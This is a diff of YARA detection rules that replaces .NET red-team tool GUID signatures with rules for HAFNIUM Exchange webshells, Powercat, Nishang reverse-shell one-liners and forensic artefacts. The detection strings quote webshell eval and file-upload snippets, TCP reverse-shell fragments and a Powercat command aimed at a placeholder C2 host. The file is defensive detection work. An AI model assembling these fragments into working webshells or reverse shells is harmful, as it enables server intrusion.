-		id = "e4266969-ab03-50dc-b5b1-f4bb1c9846f4"
-		date = "2022-11-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/MartinIngesen/TokenStomp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4997-L5011"
+		description = "Detects WebShell Injection"
+		author = "Markus Neis,Swisscom"
+		id = "aa2fcecc-4c8b-570d-a81a-5dfb16c04e05"
+		date = "2021-03-05"
+		modified = "2023-12-05"
+		reference = "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L67-L82"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7bc49a8c654a6c6e3f0aa0378e91007c8ebdac90b536fbbfc123b09ff41eaa73"
+		hash = "099c8625c58b315b6c11f5baeb859f4c"
+		logic_hash = "9309f9b57353b6fe292048d00794699a8637a3e6e429c562fb36c7e459003a3b"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "APT, HAFNIUM, WEBSHELL, FILE"
 
 	strings:
-		$typelibguid0lo = "8aac271f-9b0b-4dc3-8aa6-812bb7a57e7b" ascii wide
-		$typelibguid0up = "8AAC271F-9B0B-4DC3-8AA6-812BB7A57E7B" ascii wide
+		$x1 = "<%@ Page Language=\"Jscript\" Debug=true%>"
+		$s1 = "=Request.Form(\""
+		$s2 = "eval("
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 300 and all of ( $s* ) and $x1
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Krbrelay : FILE
+rule SIGNATURE_BASE_HKTL_PS1_Powercat_Mar21 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3f59986c-8bd8-5e70-b3eb-038247d1ccd7"
-		date = "2022-11-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/cube0x0/KrbRelay"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5013-L5029"
+		description = "Detects PowerCat hacktool"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ae3963e8-2fe9-5bc3-bf72-95f136622832"
+		date = "2021-03-02"
+		modified = "2023-12-05"
+		reference = "https://github.com/besimorhino/powercat"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L84-L103"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1cab7949f922e286ed68826cc8f0028cabdc10bd328398b6d2517ad467be50b8"
+		logic_hash = "cbd5c6f7c5b4ed713482588ee4490a2326fe11cfaacfb3bfc6a6d94130a8bc83"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c55672b5d2963969abe045fe75db52069d0300691d4f1f5923afeadf5353b9d2"
 
 	strings:
-		$typelibguid0lo = "ed839154-90d8-49db-8cdd-972d1a6b2cfd" ascii wide
-		$typelibguid0up = "ED839154-90D8-49DB-8CDD-972D1A6B2CFD" ascii wide
-		$typelibguid1lo = "3b47eebc-0d33-4e0b-bab5-782d2d3680af" ascii wide
-		$typelibguid1up = "3B47EEBC-0D33-4E0B-BAB5-782D2D3680AF" ascii wide
+		$x1 = "powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com" ascii fullword
+		$x2 = "try{[byte[]]$ReturnedData = $Encoding.GetBytes((IEX $CommandToExecute 2>&1 | Out-String))}" ascii fullword
+		$s1 = "Returning Encoded Payload..." ascii
+		$s2 = "$CommandToExecute =" ascii fullword
+		$s3 = "[alias(\"Execute\")][string]$e=\"\"," ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x7566 and filesize < 200KB and 1 of ( $x* ) or 3 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sqlrecon : FILE
+rule SIGNATURE_BASE_HKTL_Nishang_PS1_Invoke_Powershelltcponeline
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f9ea5283-0a5c-5bde-966c-80869ee25888"
-		date = "2023-01-20"
-		modified = "2023-04-06"
-		reference = "https://github.com/skahwah/SQLRecon"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5031-L5045"
+		description = "Detects PowerShell Oneliner in Nishang's repository"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0218ebbd-2dbe-5838-ab53-1e78e3f97b9e"
+		date = "2021-03-03"
+		modified = "2023-12-05"
+		reference = "https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L105-L119"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fed5ef9d4702c463fd2f138f5e4cc0a1841fc329a2923afeca83f193bb6213ea"
+		logic_hash = "59622bff95de1077d26ee4547f37cd1045c0c1fc6817df40ff2564b33a962a07"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		hash1 = "2f4c948974da341412ab742e14d8cdd33c1efa22b90135fcfae891f08494ac32"
 
 	strings:
-		$typelibguid0lo = "612c7c82-d501-417a-b8db-73204fdfda06" ascii wide
-		$typelibguid0up = "612C7C82-D501-417A-B8DB-73204FDFDA06" ascii wide
+		$s1 = "=([text.encoding]::ASCII).GetBytes((iex $" ascii wide
+		$s2 = ".GetStream();[byte[]]$" ascii wide
+		$s3 = "New-Object Net.Sockets.TCPClient('" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Certify : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASPX_Simpleseesharp : WEBSHELL UNCLASSIFIED FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "69f120fe-bd4d-59ba-b1b9-528ab300e450"
-		date = "2023-03-06"
-		modified = "2023-04-06"
-		reference = "https://github.com/GhostPack/Certify"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5047-L5062"
+		description = "A simple ASPX Webshell that allows an attacker to write further files to disk."
+		author = "threatintel@volexity.com"
+		id = "469fdf5c-e09e-5d44-a2e6-0864dcd0e18a"
+		date = "2021-03-01"
+		modified = "2023-12-05"
+		reference = "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L121-L136"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "da585a8d4985082873cb86204d546d3f53668e034c61e42d247b11e92b5e8fc3"
-		logic_hash = "bd856a146f441f28d8190d29b3168794cf2b68292869858c763200ae529615da"
+		hash = "893cd3583b49cb706b3e55ecb2ed0757b977a21f5c72e041392d1256f31166e2"
+		logic_hash = "6f62249a68bae94e5cbdb4319ea5cde9dc071ec7a4760df3aafe78bc1e072c30"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "WEBSHELL, UNCLASSIFIED, FILE"
 
 	strings:
-		$typelibguid0lo = "64524ca5-e4d0-41b3-acc3-3bdbefd40c97" ascii wide
-		$typelibguid0up = "64524CA5-E4D0-41B3-ACC3-3BDBEFD40C97" ascii wide
+		$header = "<%@ Page Language=\"C#\" %>"
+		$body = "<% HttpPostedFile thisFile = Request.Files[0];thisFile.SaveAs(Path.Combine"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$header at 0 and $body and filesize < 1KB
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Aladdin : FILE
+rule SIGNATURE_BASE_WEBSHELL_CVE_2021_27065_Webshells : CVE_2021_27065 FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3f0a954c-f3b3-5e5d-a71d-11f60b026a48"
-		date = "2023-03-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/nettitude/Aladdin"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5064-L5082"
+		description = "Detects web shells dropped by CVE-2021-27065. All actors, not specific to HAFNIUM. TLP:WHITE"
+		author = "Joe Hannon, Microsoft Threat Intelligence Center (MSTIC)"
+		id = "27677f35-24a3-59cc-a3ad-b83884128da7"
+		date = "2021-03-05"
+		modified = "2023-12-05"
+		reference = "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L182-L200"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ed23700de0e8d6527f64714b8c2e3a43c4a0798d710b67d6602b5d4ae276cbbd"
+		logic_hash = "71795ba67bc8a4cea06b93da34b6291029ff74b200e37eb66f6ac51a6ff194cd"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 61
+		tags = "CVE-2021-27065, FILE"
 
 	strings:
-		$typelibguid0lo = "b2b3adb0-1669-4b94-86cb-6dd682ddbea3" ascii wide
-		$typelibguid0up = "B2B3ADB0-1669-4B94-86CB-6DD682DDBEA3" ascii wide
-		$typelibguid1lo = "c47e4d64-cc7f-490e-8f09-055e009f33ba" ascii wide
-		$typelibguid1up = "C47E4D64-CC7F-490E-8F09-055E009F33BA" ascii wide
-		$typelibguid2lo = "32a91b0f-30cd-4c75-be79-ccbd6345de99" ascii wide
-		$typelibguid2up = "32A91B0F-30CD-4C75-BE79-CCBD6345DE99" ascii wide
+		$script1 = "script language" ascii wide nocase
+		$script2 = "page language" ascii wide nocase
+		$script3 = "runat=\"server\"" ascii wide nocase
+		$script4 = "/script" ascii wide nocase
+		$externalurl = "externalurl" ascii wide nocase
+		$internalurl = "internalurl" ascii wide nocase
+		$internalauthenticationmethods = "internalauthenticationmethods" ascii wide nocase
+		$extendedprotectiontokenchecking = "extendedprotectiontokenchecking" ascii wide nocase
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 50KB and any of ( $script* ) and ( $externalurl or $internalurl ) and $internalauthenticationmethods and $extendedprotectiontokenchecking
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpldaprelayscan : FILE
+rule SIGNATURE_BASE_APT_MAL_ASPX_HAFNIUM_Chopper_Mar21_3 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "554a5487-ac53-512f-8f6f-ad8186144715"
-		date = "2023-03-15"
-		modified = "2023-04-06"
-		reference = "https://github.com/klezVirus/SharpLdapRelayScan"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5084-L5098"
+		description = "Detects HAFNIUM ASPX files dropped on compromised servers"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9c2ba123-63c4-5e9c-a08f-bd9db3304691"
+		date = "2021-03-07"
+		modified = "2023-12-05"
+		reference = "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L202-L216"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "853b8b7e797a4be85f5218ad2f54dd4a91812e9e53ad061ca3e849326a8f9189"
-		score = 75
+		logic_hash = "391b366d78c2f24dc006a5365ec232a9a3c2fe0ea514b18897701ceeffcc81ca"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "a93ee706-a71c-4cc1-bf37-f26c27825b68" ascii wide
-		$typelibguid0up = "A93EE706-A71C-4CC1-BF37-F26C27825B68" ascii wide
+		$s1 = "runat=\"server\">void Page_Load(object" ascii wide
+		$s2 = "Request.Files[0].SaveAs(Server.MapPath(" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Ldapsigncheck : FILE
+rule SIGNATURE_BASE_APT_MAL_ASPX_HAFNIUM_Chopper_Mar21_4 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "a8b902f0-61a5-509e-8307-79bf557e5f61"
-		date = "2023-03-15"
-		modified = "2023-04-06"
-		reference = "https://github.com/cube0x0/LdapSignCheck"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5100-L5114"
+		description = "Detects HAFNIUM ASPX files dropped on compromised servers"
+		author = "Florian Roth (Nextron Systems)"
+		id = "93f5b682-642d-5edf-84a9-296bf12cd72b"
+		date = "2021-03-07"
+		modified = "2023-12-05"
+		reference = "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L218-L233"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c075fabcd39cecc2c5b5d706a1ac305bb75522b9d7f8c8cba11ca2d80da814a0"
-		score = 75
-		quality = 85
+		logic_hash = "933ab74a0e30e2a728444d491c9eb0ff134db05d905aeb48efe3ba65674a3730"
+		score = 85
+		quality = 79
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "21f398a9-bc35-4bd2-b906-866f21409744" ascii wide
-		$typelibguid0up = "21F398A9-BC35-4BD2-B906-866F21409744" ascii wide
+		$s1 = "<%@Page Language=\"Jscript\"%>" ascii wide nocase
+		$s2 = ".FromBase64String(" ascii wide nocase
+		$s3 = "eval(System.Text.Encoding." ascii wide nocase
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 850 and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsccm : FILE
+rule SIGNATURE_BASE_APT_HAFNIUM_Forensicartefacts_WER_Mar21_1 : CVE_2021_26857 FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "276269b1-e3b3-5774-a86a-1c3a8bca8209"
-		date = "2023-03-15"
-		modified = "2023-04-06"
-		reference = "https://github.com/Mayyhem/SharpSCCM"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5116-L5132"
+		description = "Detects a Windows Error Report (WER) that indicates and exploitation attempt of the Exchange server as described in CVE-2021-26857 after the corresponding patches have been applied. WER files won't be written upon successful exploitation before applying the patch. Therefore, this indicates an unsuccessful attempt."
+		author = "Florian Roth (Nextron Systems)"
+		id = "06771101-10ce-5d6b-99f7-a321aade7f69"
+		date = "2021-03-07"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/cyb3rops/status/1368471533048446976"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L235-L250"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ce0d186ceb4212619d76f56b32e06efa78572af0d8abd881432928c1876b968b"
-		score = 75
+		logic_hash = "2e135cb47f9fb5ca19ee1058fa6b4f39c098d2dfbab69bc19e80412ab695f126"
+		score = 40
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2021-26857, FILE"
 
 	strings:
-		$typelibguid0lo = "03652836-898e-4a9f-b781-b7d86e750f60" ascii wide
-		$typelibguid0up = "03652836-898E-4A9F-B781-B7D86E750F60" ascii wide
-		$typelibguid1lo = "e4d9ef39-0fce-4573-978b-abf8df6aec23" ascii wide
-		$typelibguid1up = "E4D9EF39-0FCE-4573-978B-ABF8DF6AEC23" ascii wide
+		$s1 = "AppPath=c:\\windows\\system32\\inetsrv\\w3wp.exe" wide fullword
+		$s7 = ".Value=w3wp#MSExchangeECPAppPool" wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0xfeff and filesize < 8KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Koh : FILE
+rule SIGNATURE_BASE_APT_HAFNIUM_Forensicartefacts_Cab_Recon_Mar21_1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "9702526c-b10d-553d-a803-47e352533858"
-		date = "2023-03-18"
-		modified = "2023-04-06"
-		reference = "https://github.com/GhostPack/Koh"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5134-L5148"
+		description = "Detects suspicious CAB files used by HAFNIUM for recon activity"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b0caf9d9-af0a-5181-85e4-6091cd6699e3"
+		date = "2021-03-11"
+		modified = "2023-12-05"
+		reference = "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3?u=dstepanic"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L252-L273"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b9cf1abdf4320a08f9c134e55a8f8531ef965785461b8f49687214810a143929"
-		score = 75
+		logic_hash = "de3acb2d01ad14d73263af9e62ef7c715cde259e3f2fbbcbbb41d55589c3f0ab"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "4d5350c8-7f8c-47cf-8cde-c752018af17e" ascii wide
-		$typelibguid0up = "4D5350C8-7F8C-47CF-8CDE-C752018AF17E" ascii wide
+		$s1 = "ip.txt" ascii fullword
+		$s2 = "arp.txt" ascii fullword
+		$s3 = "system" ascii fullword
+		$s4 = "security" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint32( 0 ) == 0x4643534d and filesize < 10000KB and ( $s1 in ( 0 .. 200 ) and $s2 in ( 0 .. 200 ) and $s3 in ( 0 .. 200 ) and $s4 in ( 0 .. 200 ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Forgecert : FILE
+rule SIGNATURE_BASE_WEBSHELL_Compiled_Webshell_Mar2021_1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "06b3ffbb-5a76-50a0-86dc-b9658bf2d7ec"
-		date = "2023-03-18"
-		modified = "2023-04-06"
-		reference = "https://github.com/GhostPack/ForgeCert"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5150-L5164"
+		description = "Triggers on temporary pe files containing strings commonly used in webshells."
+		author = "Bundesamt fuer Sicherheit in der Informationstechnik"
+		id = "9336bd2c-791c-5c3e-9733-724a6a23864a"
+		date = "2021-03-05"
+		modified = "2021-03-12"
+		reference = "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L275-L295"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6fecf2a1ce947de3978b4e10b1b02f35913a37551884f16eabd1d1d544d963b6"
+		logic_hash = "d2e5f91f7bb50984c491eb9632d3863febc986760e4d03c8255872887ce4dc4a"
 		score = 75
-		quality = 85
+		quality = 56
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "bd346689-8ee6-40b3-858b-4ed94f08d40a" ascii wide
-		$typelibguid0up = "BD346689-8EE6-40B3-858B-4ED94F08D40A" ascii wide
+		$x1 = /App_Web_[a-zA-Z0-9]{7,8}.dll/ ascii wide fullword
+		$a1 = "~/aspnet_client/" ascii wide nocase
+		$a2 = "~/auth/" ascii wide nocase
+		$b1 = "JScriptEvaluate" ascii wide fullword
+		$c1 = "get_Request" ascii wide fullword
+		$c2 = "get_Files" ascii wide fullword
+		$c3 = "get_Count" ascii wide fullword
+		$c4 = "get_Item" ascii wide fullword
+		$c5 = "get_Server" ascii wide fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize > 5KB and filesize < 40KB and all of ( $x* ) and 1 of ( $a* ) and ( all of ( $b* ) or all of ( $c* ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Crassus : FILE
+rule SIGNATURE_BASE_APT_MAL_ASP_DLL_HAFNIUM_Mar21_1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d4f94aa3-0431-5ac1-8718-0f0526c3714f"
-		date = "2023-03-18"
-		modified = "2023-04-06"
-		reference = "https://github.com/vu-ls/Crassus"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5166-L5180"
+		description = "Detects HAFNIUM compiled ASP.NET DLLs dropped on compromised servers"
+		author = "Florian Roth (Nextron Systems)"
+		id = "68b8252e-a07d-5507-b556-a4d473f98157"
+		date = "2021-03-05"
+		modified = "2023-12-05"
+		reference = "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L297-L325"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "27c2c67aed20f3d1ec2ef0393342e21a41590cc05c0361309054e0dc699d7cc9"
-		score = 75
+		logic_hash = "a4a3f9c7029e67647823a13079655b24648f5e4a7e238439b7a933b19477c20c"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "097f5f700c000a13b91855beb61a931d34fb0abb738a110368f525e25c5bc738"
+		hash2 = "15744e767cbaa9b37ff7bb5c036dda9b653fc54fc9a96fe73fbd639150b3daa3"
+		hash3 = "52ae4de2e3f0ef7fe27c699cb60d41129a3acd4a62be60accc85d88c296e1ddb"
+		hash4 = "5f0480035ee23a12302c88be10e54bf3adbcf271a4bb1106d4975a28234d3af8"
+		hash5 = "6243fd2826c528ee329599153355fd00153dee611ca33ec17effcf00205a6e4e"
+		hash6 = "ebf6799bb86f0da2b05e66a0fe5a9b42df6dac848f4b951b2ed7b7a4866f19ef"
 
 	strings:
-		$typelibguid0lo = "7e9729aa-4cf2-4d0a-8183-7fb7ce7a5b1a" ascii wide
-		$typelibguid0up = "7E9729AA-4CF2-4D0A-8183-7FB7CE7A5B1A" ascii wide
+		$s1 = "Page_Load" ascii fullword
+		$sc1 = { 20 00 3A 00 20 00 68 00 74 00 74 00 70 00 3A 00
+               2F 00 2F 00 (66|67) 00 2F 00 00 89 A3 0D 00 0A 00 }
+		$op1 = { 00 43 00 58 00 77 00 30 00 4a 00 45 00 00 51 7e 00 2f }
+		$op2 = { 58 00 77 00 30 00 4a 00 45 00 00 51 7e 00 2f 00 61 00 }
+		$op3 = { 01 0e 0e 05 20 01 01 11 79 04 07 01 12 2d 04 07 01 12 31 02 }
+		$op4 = { 5e 00 03 00 bc 22 00 00 00 00 01 00 85 03 2b 00 03 00 cc }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of ( $s* ) or all of ( $op* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Restrictedadmin : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASPX_Fileexplorer_Mar21_1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "1b3572a5-bb21-58bb-91f9-963a0a17d699"
-		date = "2023-03-18"
-		modified = "2023-04-06"
-		reference = "https://github.com/GhostPack/RestrictedAdmin"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5182-L5196"
+		description = "Detects Chopper like ASPX Webshells"
+		author = "Florian Roth (Nextron Systems)"
+		id = "edcaa2a8-6fea-584e-90c2-307a2dfc9f7f"
+		date = "2021-03-31"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L363-L397"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fc8fe9df771fb794a2ea44d68741003451747a7eb10156a9ed486f87a2d42c6d"
-		score = 75
+		logic_hash = "7b4ffd222b38e76455fff2650b72bdcaff281323103f342b427013cd3fffdc21"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75"
 
 	strings:
-		$typelibguid0lo = "79f11fc0-abff-4e1f-b07c-5d65653d8952" ascii wide
-		$typelibguid0up = "79F11FC0-ABFF-4E1F-B07C-5D65653D8952" ascii wide
+		$x1 = "<span style=\"background-color: #778899; color: #fff; padding: 5px; cursor: pointer\" onclick=" ascii
+		$xc1 = { 3C 61 73 70 3A 48 69 64 64 65 6E 46 69 65 6C 64
+               20 72 75 6E 61 74 3D 22 73 65 72 76 65 72 22 20
+               49 44 3D 22 ?? ?? ?? ?? ?? 22 20 2F 3E 3C 62 72
+               20 2F 3E 3C 62 72 20 2F 3E 20 50 72 6F 63 65 73
+               73 20 4E 61 6D 65 3A 3C 61 73 70 3A 54 65 78 74
+               42 6F 78 20 49 44 3D }
+		$xc2 = { 22 3E 43 6F 6D 6D 61 6E 64 3C 2F 6C 61 62 65 6C
+               3E 3C 69 6E 70 75 74 20 69 64 3D 22 ?? ?? ?? ??
+               ?? 22 20 74 79 70 65 3D 22 72 61 64 69 6F 22 20
+               6E 61 6D 65 3D 22 74 61 62 73 22 3E 3C 6C 61 62
+               65 6C 20 66 6F 72 3D 22 ?? ?? ?? ?? ?? 22 3E 46
+               69 6C 65 20 45 78 70 6C 6F 72 65 72 3C 2F 6C 61
+               62 65 6C 3E 3C 25 2D 2D }
+		$r1 = "(Request.Form[" ascii
